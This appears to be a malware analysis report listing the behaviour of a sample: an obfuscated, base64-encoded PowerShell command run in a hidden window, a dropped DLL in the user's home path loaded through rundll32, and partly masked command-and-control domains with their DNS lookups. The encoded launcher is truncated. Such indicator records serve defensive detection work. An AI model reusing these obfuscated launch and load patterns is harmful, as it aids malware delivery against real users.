Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABDAHgAawA0AF8AMwBtAD0AKAAnAFgAJwArACgAJwBnAHEAagAnACsAJwB0ACcAKQArACcAbQAxACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAHIATwBGAGkAbABlAFwAZwBzA...
- %HOMEPATH%\gsx9tzb\kt1_x0z\uhenop.dll
- 'si##ecor.cl':443
- 'sa####gdalpur.org':443
- 'wc.###atronic.es':443
- DNS ASK si##ecor.cl
- DNS ASK sa####gdalpur.org
- DNS ASK wc.###atronic.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABDAHgAawA0AF8AMwBtAD0AKAAnAFgAJwArACgAJwBnAHEAagAnACsAJwB0ACcAKQArACcAbQAxACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAGUAUgBwAHIATwBGAGkAbABlAFwAZwBzA...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Gsx9tzb\Kt1_x0z\Uhenop.dll 0